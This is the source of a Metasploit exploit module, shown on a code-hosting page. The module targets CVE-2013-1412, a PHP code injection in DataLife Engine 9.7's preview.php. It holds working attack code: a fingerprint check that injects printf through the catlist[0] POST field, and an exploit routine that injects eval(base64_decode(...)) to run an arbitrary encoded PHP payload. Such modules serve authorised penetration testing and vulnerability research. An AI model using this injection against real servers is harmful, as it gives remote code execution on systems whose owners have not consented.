Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/datalife_preview_exec.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'DataLife Engine preview.php PHP Code Injection',

16
        'Description' => %q{

17
          This module exploits a PHP code injection vulnerability DataLife Engine 9.7.

18
          The vulnerability exists in preview.php, due to an insecure usage of preg_replace()

19
          with the e modifier, which allows to inject arbitrary php code, when there is a

20
          template installed which contains a [catlist] or [not-catlist] tag, even when the

21
          template isn't in use currently. The template can be configured with the TEMPLATE

22
          datastore option.

23
        },

24
        'Author' => [

25
          'EgiX', # Vulnerability discovery

26
          'juan vazquez' # Metasploit module

27
        ],

28
        'License' => MSF_LICENSE,

29
        'References' => [

30
          [ 'CVE', '2013-1412' ],

31
          [ 'OSVDB', '89662' ],

32
          [ 'EDB', '24438' ],

33
          [ 'BID', '57603' ],

34
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],

35
          [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]

36
        ],

37
        'Privileged' => false,

38
        'Platform' => ['php'],

39
        'Arch' => ARCH_PHP,

40
        'Payload' => {

41
          'Keys' => ['php']

42
        },

43
        'DisclosureDate' => '2013-01-28',

44
        'Targets' => [ ['DataLife Engine 9.7', {}], ],

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53


54
    register_options(

55
      [

56
        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),

57
        OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])

58
      ]

59
    )

60
  end

61


62
  def uri

63
    normalize_uri(target_uri.path, 'engine', 'preview.php')

64
  end

65


66
  def send_injection(inj)

67
    res = send_request_cgi(

68
      {

69
        'uri' => uri,

70
        'method' => 'POST',

71
        'vars_post' =>

72
          {

73
            'catlist[0]' => inj

74
          },

75
        'cookie' => "dle_skin=#{datastore['TEMPLATE']}"

76
      }

77
    )

78
    res

79
  end

80


81
  def check

82
    fingerprint = rand_text_alpha(4 + rand(4))

83


84
    res = send_injection("#{rand_text_alpha(4 + rand(4))}')||printf(\"#{fingerprint}\");//")

85


86
    if res and res.code == 200 and res.body =~ /#{fingerprint}/

87
      return Exploit::CheckCode::Vulnerable

88
    else

89
      return Exploit::CheckCode::Safe

90
    end

91
  end

92


93
  def exploit

94
    print_status("Exploiting the preg_replace() to execute PHP code")

95
    res = send_injection("#{rand_text_alpha(4 + rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")

96
  end

97
end

98


99